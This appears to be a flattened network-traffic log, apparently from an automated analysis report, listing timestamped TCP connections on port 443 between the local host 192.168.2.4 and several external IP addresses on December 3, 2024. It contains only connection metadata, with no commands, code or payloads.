                                            Dec 3, 2024 09:56:56.284480095 CET49740443192.168.2.4173.254.24.56
                                            Dec 3, 2024 09:56:56.331531048 CET49739443192.168.2.4173.254.24.56
                                            Dec 3, 2024 09:56:56.331540108 CET44349739173.254.24.56192.168.2.4
                                            Dec 3, 2024 09:56:56.378156900 CET49739443192.168.2.4173.254.24.56
                                            Dec 3, 2024 09:56:56.534696102 CET4434974123.218.208.109192.168.2.4
                                            Dec 3, 2024 09:56:56.534821033 CET49741443192.168.2.423.218.208.109
                                            Dec 3, 2024 09:56:56.536119938 CET49741443192.168.2.423.218.208.109
                                            Dec 3, 2024 09:56:56.536130905 CET4434974123.218.208.109192.168.2.4
                                            Dec 3, 2024 09:56:56.536401033 CET4434974123.218.208.109192.168.2.4
                                            Dec 3, 2024 09:56:56.537594080 CET49741443192.168.2.423.218.208.109
                                            Dec 3, 2024 09:56:56.583329916 CET4434974123.218.208.109192.168.2.4
                                            Dec 3, 2024 09:56:56.755449057 CET44349740173.254.24.56192.168.2.4
                                            Dec 3, 2024 09:56:56.755481005 CET44349740173.254.24.56192.168.2.4
                                            Dec 3, 2024 09:56:56.755490065 CET44349740173.254.24.56192.168.2.4
                                            Dec 3, 2024 09:56:56.755584955 CET49740443192.168.2.4173.254.24.56
                                            Dec 3, 2024 09:56:56.755600929 CET44349740173.254.24.56192.168.2.4
                                            Dec 3, 2024 09:56:56.799166918 CET49740443192.168.2.4173.254.24.56
                                            Dec 3, 2024 09:56:56.864309072 CET44349740173.254.24.56192.168.2.4
                                            Dec 3, 2024 09:56:56.864324093 CET44349740173.254.24.56192.168.2.4
                                            Dec 3, 2024 09:56:56.864425898 CET49740443192.168.2.4173.254.24.56
                                            Dec 3, 2024 09:56:56.956264019 CET44349740173.254.24.56192.168.2.4
                                            Dec 3, 2024 09:56:56.956270933 CET44349740173.254.24.56192.168.2.4
                                            Dec 3, 2024 09:56:56.956371069 CET49740443192.168.2.4173.254.24.56
                                            Dec 3, 2024 09:56:56.984546900 CET44349740173.254.24.56192.168.2.4
                                            Dec 3, 2024 09:56:56.984555006 CET44349740173.254.24.56192.168.2.4
                                            Dec 3, 2024 09:56:56.984638929 CET49740443192.168.2.4173.254.24.56
                                            Dec 3, 2024 09:56:56.997984886 CET44349740173.254.24.56192.168.2.4
                                            Dec 3, 2024 09:56:56.998059034 CET44349740173.254.24.56192.168.2.4
                                            Dec 3, 2024 09:56:56.998141050 CET49740443192.168.2.4173.254.24.56
                                            Dec 3, 2024 09:56:56.998141050 CET49740443192.168.2.4173.254.24.56
                                            Dec 3, 2024 09:56:56.998441935 CET49740443192.168.2.4173.254.24.56
                                            Dec 3, 2024 09:56:56.998457909 CET44349740173.254.24.56192.168.2.4
                                            Dec 3, 2024 09:56:57.054214954 CET4434974123.218.208.109192.168.2.4
                                            Dec 3, 2024 09:56:57.054275036 CET4434974123.218.208.109192.168.2.4
                                            Dec 3, 2024 09:56:57.054389000 CET49741443192.168.2.423.218.208.109
                                            Dec 3, 2024 09:56:57.055177927 CET49741443192.168.2.423.218.208.109
                                            Dec 3, 2024 09:56:57.055191040 CET4434974123.218.208.109192.168.2.4
                                            Dec 3, 2024 09:56:57.055210114 CET49741443192.168.2.423.218.208.109
                                            Dec 3, 2024 09:56:57.055214882 CET4434974123.218.208.109192.168.2.4
                                            Dec 3, 2024 09:56:57.132579088 CET49743443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:56:57.132599115 CET4434974391.134.9.160192.168.2.4
                                            Dec 3, 2024 09:56:57.132663965 CET49743443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:56:57.132729053 CET49744443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:56:57.132751942 CET4434974491.134.9.160192.168.2.4
                                            Dec 3, 2024 09:56:57.132805109 CET49744443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:56:57.132922888 CET49743443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:56:57.132935047 CET4434974391.134.9.160192.168.2.4
                                            Dec 3, 2024 09:56:57.133069038 CET49744443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:56:57.133080006 CET4434974491.134.9.160192.168.2.4
                                            Dec 3, 2024 09:56:58.552010059 CET4434974391.134.9.160192.168.2.4
                                            Dec 3, 2024 09:56:58.552293062 CET49743443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:56:58.552319050 CET4434974391.134.9.160192.168.2.4
                                            Dec 3, 2024 09:56:58.553383112 CET4434974391.134.9.160192.168.2.4
                                            Dec 3, 2024 09:56:58.553457975 CET49743443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:56:58.554454088 CET49743443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:56:58.554507971 CET4434974391.134.9.160192.168.2.4
                                            Dec 3, 2024 09:56:58.554666996 CET49743443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:56:58.554672956 CET4434974391.134.9.160192.168.2.4
                                            Dec 3, 2024 09:56:58.608568907 CET49743443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:56:58.771543980 CET4434974491.134.9.160192.168.2.4
                                            Dec 3, 2024 09:56:58.771855116 CET49744443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:56:58.771877050 CET4434974491.134.9.160192.168.2.4
                                            Dec 3, 2024 09:56:58.772890091 CET4434974491.134.9.160192.168.2.4
                                            Dec 3, 2024 09:56:58.772958994 CET49744443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:56:58.773297071 CET49744443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:56:58.773356915 CET4434974491.134.9.160192.168.2.4
                                            Dec 3, 2024 09:56:58.773430109 CET49744443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:56:58.773436069 CET4434974491.134.9.160192.168.2.4
                                            Dec 3, 2024 09:56:58.813138008 CET49744443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:56:59.071607113 CET4434974391.134.9.160192.168.2.4
                                            Dec 3, 2024 09:56:59.071628094 CET4434974391.134.9.160192.168.2.4
                                            Dec 3, 2024 09:56:59.071698904 CET49743443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:56:59.071724892 CET4434974391.134.9.160192.168.2.4
                                            Dec 3, 2024 09:56:59.071767092 CET49743443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:56:59.079683065 CET4434974391.134.9.160192.168.2.4
                                            Dec 3, 2024 09:56:59.079777002 CET49743443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:56:59.092015028 CET4434974391.134.9.160192.168.2.4
                                            Dec 3, 2024 09:56:59.092097998 CET49743443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:56:59.189203024 CET4434974391.134.9.160192.168.2.4
                                            Dec 3, 2024 09:56:59.189333916 CET49743443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:56:59.275748014 CET4434974391.134.9.160192.168.2.4
                                            Dec 3, 2024 09:56:59.275882006 CET49743443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:56:59.288297892 CET4434974391.134.9.160192.168.2.4
                                            Dec 3, 2024 09:56:59.288393974 CET49743443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:56:59.290036917 CET4434974491.134.9.160192.168.2.4
                                            Dec 3, 2024 09:56:59.290065050 CET4434974491.134.9.160192.168.2.4
                                            Dec 3, 2024 09:56:59.290133953 CET4434974491.134.9.160192.168.2.4
                                            Dec 3, 2024 09:56:59.290137053 CET49744443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:56:59.290175915 CET49744443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:56:59.291229963 CET49744443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:56:59.291245937 CET4434974491.134.9.160192.168.2.4
                                            Dec 3, 2024 09:56:59.294986963 CET4434974391.134.9.160192.168.2.4
                                            Dec 3, 2024 09:56:59.295063972 CET49743443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:56:59.306997061 CET4434974391.134.9.160192.168.2.4
                                            Dec 3, 2024 09:56:59.307077885 CET49743443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:56:59.319380999 CET4434974391.134.9.160192.168.2.4
                                            Dec 3, 2024 09:56:59.319463968 CET49743443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:56:59.325782061 CET4434974391.134.9.160192.168.2.4
                                            Dec 3, 2024 09:56:59.325861931 CET49743443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:56:59.337589979 CET4434974391.134.9.160192.168.2.4
                                            Dec 3, 2024 09:56:59.337677002 CET49743443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:56:59.431941986 CET4434974391.134.9.160192.168.2.4
                                            Dec 3, 2024 09:56:59.432051897 CET49743443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:56:59.434607029 CET49745443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:56:59.434633017 CET4434974591.134.10.168192.168.2.4
                                            Dec 3, 2024 09:56:59.434706926 CET49745443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:56:59.434895992 CET49745443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:56:59.434909105 CET4434974591.134.10.168192.168.2.4
                                            Dec 3, 2024 09:56:59.473900080 CET4434974391.134.9.160192.168.2.4
                                            Dec 3, 2024 09:56:59.473987103 CET49743443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:56:59.473990917 CET4434974391.134.9.160192.168.2.4
                                            Dec 3, 2024 09:56:59.474040031 CET49743443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:56:59.474472046 CET49743443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:56:59.474482059 CET4434974391.134.9.160192.168.2.4
                                            Dec 3, 2024 09:56:59.478317976 CET49746443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:56:59.478349924 CET4434974691.134.10.168192.168.2.4
                                            Dec 3, 2024 09:56:59.478421926 CET49746443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:56:59.478615046 CET49746443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:56:59.478626966 CET4434974691.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:00.050595045 CET49747443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:57:00.050652981 CET4434974791.134.9.160192.168.2.4
                                            Dec 3, 2024 09:57:00.050712109 CET49747443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:57:00.051052094 CET49747443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:57:00.051068068 CET4434974791.134.9.160192.168.2.4
                                            Dec 3, 2024 09:57:00.225826025 CET49750443192.168.2.4104.26.13.205
                                            Dec 3, 2024 09:57:00.225874901 CET44349750104.26.13.205192.168.2.4
                                            Dec 3, 2024 09:57:00.225929976 CET49750443192.168.2.4104.26.13.205
                                            Dec 3, 2024 09:57:00.226159096 CET49750443192.168.2.4104.26.13.205
                                            Dec 3, 2024 09:57:00.226186037 CET44349750104.26.13.205192.168.2.4
                                            Dec 3, 2024 09:57:00.857219934 CET4434974591.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:00.857536077 CET49745443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:00.857561111 CET4434974591.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:00.858628988 CET4434974591.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:00.859045982 CET49745443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:00.859045982 CET49745443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:00.859127045 CET4434974591.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:00.859245062 CET49745443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:00.903343916 CET4434974591.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:00.913278103 CET49745443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:00.913291931 CET4434974591.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:00.960247040 CET49745443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:01.134253979 CET4434974691.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:01.135994911 CET49746443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:01.136017084 CET4434974691.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:01.136908054 CET4434974691.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:01.137346983 CET49746443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:01.137346983 CET49746443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:01.137403011 CET4434974691.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:01.137651920 CET49746443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:01.137658119 CET4434974691.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:01.190232992 CET49746443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:01.439975023 CET49751443192.168.2.420.12.23.50
                                            Dec 3, 2024 09:57:01.440005064 CET4434975120.12.23.50192.168.2.4
                                            Dec 3, 2024 09:57:01.440660954 CET49751443192.168.2.420.12.23.50
                                            Dec 3, 2024 09:57:01.441314936 CET49751443192.168.2.420.12.23.50
                                            Dec 3, 2024 09:57:01.441327095 CET4434975120.12.23.50192.168.2.4
                                            Dec 3, 2024 09:57:01.484675884 CET44349750104.26.13.205192.168.2.4
                                            Dec 3, 2024 09:57:01.484985113 CET49750443192.168.2.4104.26.13.205
                                            Dec 3, 2024 09:57:01.484999895 CET44349750104.26.13.205192.168.2.4
                                            Dec 3, 2024 09:57:01.485876083 CET44349750104.26.13.205192.168.2.4
                                            Dec 3, 2024 09:57:01.486032963 CET49750443192.168.2.4104.26.13.205
                                            Dec 3, 2024 09:57:01.487199068 CET49750443192.168.2.4104.26.13.205
                                            Dec 3, 2024 09:57:01.487256050 CET44349750104.26.13.205192.168.2.4
                                            Dec 3, 2024 09:57:01.487581015 CET49750443192.168.2.4104.26.13.205
                                            Dec 3, 2024 09:57:01.487588882 CET44349750104.26.13.205192.168.2.4
                                            Dec 3, 2024 09:57:01.512413979 CET4434974591.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:01.512443066 CET4434974591.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:01.512486935 CET4434974591.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:01.512520075 CET49745443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:01.512609005 CET49745443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:01.517601967 CET49745443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:01.517616034 CET4434974591.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:01.531919956 CET49750443192.168.2.4104.26.13.205
                                            Dec 3, 2024 09:57:01.657840014 CET4434974691.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:01.657867908 CET4434974691.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:01.658056974 CET49746443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:01.658078909 CET4434974691.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:01.658241987 CET49746443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:01.758373022 CET4434974791.134.9.160192.168.2.4
                                            Dec 3, 2024 09:57:01.758630991 CET49747443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:57:01.758658886 CET4434974791.134.9.160192.168.2.4
                                            Dec 3, 2024 09:57:01.758943081 CET4434974791.134.9.160192.168.2.4
                                            Dec 3, 2024 09:57:01.759372950 CET49747443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:57:01.759439945 CET4434974791.134.9.160192.168.2.4
                                            Dec 3, 2024 09:57:01.759598017 CET49747443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:57:01.766532898 CET4434974691.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:01.766601086 CET49746443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:01.783268929 CET4434974691.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:01.783334017 CET49746443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:01.799974918 CET4434974691.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:01.800070047 CET49746443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:01.803335905 CET4434974791.134.9.160192.168.2.4
                                            Dec 3, 2024 09:57:01.863989115 CET4434974691.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:01.864075899 CET49746443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:01.882764101 CET4434974691.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:01.882831097 CET49746443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:01.939764023 CET44349750104.26.13.205192.168.2.4
                                            Dec 3, 2024 09:57:01.939826012 CET44349750104.26.13.205192.168.2.4
                                            Dec 3, 2024 09:57:01.939902067 CET49750443192.168.2.4104.26.13.205
                                            Dec 3, 2024 09:57:01.941690922 CET49750443192.168.2.4104.26.13.205
                                            Dec 3, 2024 09:57:01.941719055 CET44349750104.26.13.205192.168.2.4
                                            Dec 3, 2024 09:57:01.968986988 CET4434974691.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:01.969084978 CET49746443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:01.984497070 CET4434974691.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:01.984582901 CET49746443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:01.993031979 CET4434974691.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:01.993103981 CET49746443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:02.009723902 CET4434974691.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:02.009797096 CET49746443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:02.026534081 CET4434974691.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:02.026618958 CET49746443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:02.031383991 CET4434974691.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:02.031445980 CET49746443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:02.059396982 CET4434974691.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:02.059465885 CET4434974691.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:02.059490919 CET49746443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:02.059544086 CET49746443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:02.059801102 CET49746443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:02.059823036 CET4434974691.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:02.088838100 CET49752443192.168.2.4104.26.12.205
                                            Dec 3, 2024 09:57:02.088893890 CET44349752104.26.12.205192.168.2.4
                                            Dec 3, 2024 09:57:02.088993073 CET49752443192.168.2.4104.26.12.205
                                            Dec 3, 2024 09:57:02.089255095 CET49752443192.168.2.4104.26.12.205
                                            Dec 3, 2024 09:57:02.089271069 CET44349752104.26.12.205192.168.2.4
                                            Dec 3, 2024 09:57:02.291495085 CET4434974791.134.9.160192.168.2.4
                                            Dec 3, 2024 09:57:02.291522980 CET4434974791.134.9.160192.168.2.4
                                            Dec 3, 2024 09:57:02.291600943 CET49747443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:57:02.291632891 CET4434974791.134.9.160192.168.2.4
                                            Dec 3, 2024 09:57:02.291673899 CET49747443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:57:02.296505928 CET4434974791.134.9.160192.168.2.4
                                            Dec 3, 2024 09:57:02.296576023 CET49747443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:57:02.312199116 CET4434974791.134.9.160192.168.2.4
                                            Dec 3, 2024 09:57:02.312272072 CET49747443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:57:02.501358986 CET4434974791.134.9.160192.168.2.4
                                            Dec 3, 2024 09:57:02.501425982 CET49747443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:57:02.505708933 CET4434974791.134.9.160192.168.2.4
                                            Dec 3, 2024 09:57:02.505765915 CET49747443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:57:02.522413969 CET4434974791.134.9.160192.168.2.4
                                            Dec 3, 2024 09:57:02.522464991 CET49747443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:57:02.539055109 CET4434974791.134.9.160192.168.2.4
                                            Dec 3, 2024 09:57:02.539110899 CET49747443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:57:02.547576904 CET4434974791.134.9.160192.168.2.4
                                            Dec 3, 2024 09:57:02.547635078 CET49747443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:57:02.562266111 CET4434974791.134.9.160192.168.2.4
                                            Dec 3, 2024 09:57:02.562314987 CET49747443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:57:02.574532032 CET4434974791.134.9.160192.168.2.4
                                            Dec 3, 2024 09:57:02.574588060 CET49747443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:57:02.581053019 CET4434974791.134.9.160192.168.2.4
                                            Dec 3, 2024 09:57:02.581105947 CET49747443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:57:02.711999893 CET4434974791.134.9.160192.168.2.4
                                            Dec 3, 2024 09:57:02.712065935 CET49747443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:57:02.718686104 CET4434974791.134.9.160192.168.2.4
                                            Dec 3, 2024 09:57:02.718740940 CET49747443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:57:02.725097895 CET4434974791.134.9.160192.168.2.4
                                            Dec 3, 2024 09:57:02.725152969 CET49747443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:57:02.734283924 CET4434974791.134.9.160192.168.2.4
                                            Dec 3, 2024 09:57:02.734339952 CET49747443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:57:02.739025116 CET4434974791.134.9.160192.168.2.4
                                            Dec 3, 2024 09:57:02.739078999 CET49747443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:57:02.748267889 CET4434974791.134.9.160192.168.2.4
                                            Dec 3, 2024 09:57:02.748337984 CET49747443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:57:02.757373095 CET4434974791.134.9.160192.168.2.4
                                            Dec 3, 2024 09:57:02.757424116 CET49747443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:57:02.762095928 CET4434974791.134.9.160192.168.2.4
                                            Dec 3, 2024 09:57:02.762151957 CET49747443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:57:02.772077084 CET4434974791.134.9.160192.168.2.4
                                            Dec 3, 2024 09:57:02.772124052 CET49747443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:57:02.780422926 CET4434974791.134.9.160192.168.2.4
                                            Dec 3, 2024 09:57:02.780467987 CET49747443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:57:02.785733938 CET4434974791.134.9.160192.168.2.4
                                            Dec 3, 2024 09:57:02.785780907 CET49747443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:57:02.796809912 CET4434974791.134.9.160192.168.2.4
                                            Dec 3, 2024 09:57:02.796864986 CET49747443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:57:02.804703951 CET4434974791.134.9.160192.168.2.4
                                            Dec 3, 2024 09:57:02.804757118 CET49747443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:57:02.809531927 CET4434974791.134.9.160192.168.2.4
                                            Dec 3, 2024 09:57:02.809582949 CET49747443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:57:02.818734884 CET4434974791.134.9.160192.168.2.4
                                            Dec 3, 2024 09:57:02.818792105 CET49747443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:57:02.922068119 CET4434974791.134.9.160192.168.2.4
                                            Dec 3, 2024 09:57:02.922130108 CET49747443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:57:02.926552057 CET4434974791.134.9.160192.168.2.4
                                            Dec 3, 2024 09:57:02.926604033 CET49747443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:57:02.930270910 CET4434974791.134.9.160192.168.2.4
                                            Dec 3, 2024 09:57:02.930322886 CET49747443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:57:02.937525988 CET4434974791.134.9.160192.168.2.4
                                            Dec 3, 2024 09:57:02.937581062 CET49747443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:57:02.943809032 CET4434974791.134.9.160192.168.2.4
                                            Dec 3, 2024 09:57:02.943872929 CET49747443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:57:02.947202921 CET4434974791.134.9.160192.168.2.4
                                            Dec 3, 2024 09:57:02.947365046 CET49747443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:57:02.953469992 CET4434974791.134.9.160192.168.2.4
                                            Dec 3, 2024 09:57:02.953541040 CET49747443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:57:02.959753036 CET4434974791.134.9.160192.168.2.4
                                            Dec 3, 2024 09:57:02.959824085 CET49747443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:57:02.963061094 CET4434974791.134.9.160192.168.2.4
                                            Dec 3, 2024 09:57:02.963114977 CET49747443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:57:02.969367981 CET4434974791.134.9.160192.168.2.4
                                            Dec 3, 2024 09:57:02.969434977 CET49747443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:57:02.975539923 CET4434974791.134.9.160192.168.2.4
                                            Dec 3, 2024 09:57:02.975604057 CET49747443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:57:02.978848934 CET4434974791.134.9.160192.168.2.4
                                            Dec 3, 2024 09:57:02.978899002 CET49747443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:57:02.985181093 CET4434974791.134.9.160192.168.2.4
                                            Dec 3, 2024 09:57:02.985250950 CET49747443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:57:02.988168001 CET4434974791.134.9.160192.168.2.4
                                            Dec 3, 2024 09:57:02.988228083 CET49747443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:57:02.988236904 CET4434974791.134.9.160192.168.2.4
                                            Dec 3, 2024 09:57:02.988250971 CET4434974791.134.9.160192.168.2.4
                                            Dec 3, 2024 09:57:02.988284111 CET49747443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:57:02.988317013 CET49747443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:57:02.988581896 CET49747443192.168.2.491.134.9.160
                                            Dec 3, 2024 09:57:02.988598108 CET4434974791.134.9.160192.168.2.4
                                            Dec 3, 2024 09:57:03.003922939 CET49739443192.168.2.4173.254.24.56
                                            Dec 3, 2024 09:57:03.016896963 CET49754443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:03.016940117 CET4434975491.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:03.017045021 CET49754443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:03.017730951 CET49754443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:03.017745972 CET4434975491.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:03.051331043 CET44349739173.254.24.56192.168.2.4
                                            Dec 3, 2024 09:57:03.057531118 CET4434975120.12.23.50192.168.2.4
                                            Dec 3, 2024 09:57:03.057625055 CET49751443192.168.2.420.12.23.50
                                            Dec 3, 2024 09:57:03.060595036 CET49751443192.168.2.420.12.23.50
                                            Dec 3, 2024 09:57:03.060602903 CET4434975120.12.23.50192.168.2.4
                                            Dec 3, 2024 09:57:03.060866117 CET4434975120.12.23.50192.168.2.4
                                            Dec 3, 2024 09:57:03.116219997 CET49751443192.168.2.420.12.23.50
                                            Dec 3, 2024 09:57:03.390177965 CET44349752104.26.12.205192.168.2.4
                                            Dec 3, 2024 09:57:03.390480042 CET49752443192.168.2.4104.26.12.205
                                            Dec 3, 2024 09:57:03.390494108 CET44349752104.26.12.205192.168.2.4
                                            Dec 3, 2024 09:57:03.391364098 CET44349752104.26.12.205192.168.2.4
                                            Dec 3, 2024 09:57:03.391431093 CET49752443192.168.2.4104.26.12.205
                                            Dec 3, 2024 09:57:03.391736984 CET49752443192.168.2.4104.26.12.205
                                            Dec 3, 2024 09:57:03.391799927 CET44349752104.26.12.205192.168.2.4
                                            Dec 3, 2024 09:57:03.391927004 CET49752443192.168.2.4104.26.12.205
                                            Dec 3, 2024 09:57:03.391935110 CET44349752104.26.12.205192.168.2.4
                                            Dec 3, 2024 09:57:03.404247046 CET44349739173.254.24.56192.168.2.4
                                            Dec 3, 2024 09:57:03.404527903 CET44349739173.254.24.56192.168.2.4
                                            Dec 3, 2024 09:57:03.404592037 CET49739443192.168.2.4173.254.24.56
                                            Dec 3, 2024 09:57:03.405850887 CET49739443192.168.2.4173.254.24.56
                                            Dec 3, 2024 09:57:03.405865908 CET44349739173.254.24.56192.168.2.4
                                            Dec 3, 2024 09:57:03.437638044 CET49752443192.168.2.4104.26.12.205
                                            Dec 3, 2024 09:57:03.565053940 CET49756443192.168.2.4173.254.24.56
                                            Dec 3, 2024 09:57:03.565089941 CET44349756173.254.24.56192.168.2.4
                                            Dec 3, 2024 09:57:03.565150023 CET49756443192.168.2.4173.254.24.56
                                            Dec 3, 2024 09:57:03.565351963 CET49756443192.168.2.4173.254.24.56
                                            Dec 3, 2024 09:57:03.565366983 CET44349756173.254.24.56192.168.2.4
                                            Dec 3, 2024 09:57:03.642421007 CET44349737172.217.21.36192.168.2.4
                                            Dec 3, 2024 09:57:03.642472029 CET44349737172.217.21.36192.168.2.4
                                            Dec 3, 2024 09:57:03.642520905 CET49737443192.168.2.4172.217.21.36
                                            Dec 3, 2024 09:57:03.859648943 CET44349752104.26.12.205192.168.2.4
                                            Dec 3, 2024 09:57:03.859714985 CET44349752104.26.12.205192.168.2.4
                                            Dec 3, 2024 09:57:03.859780073 CET49752443192.168.2.4104.26.12.205
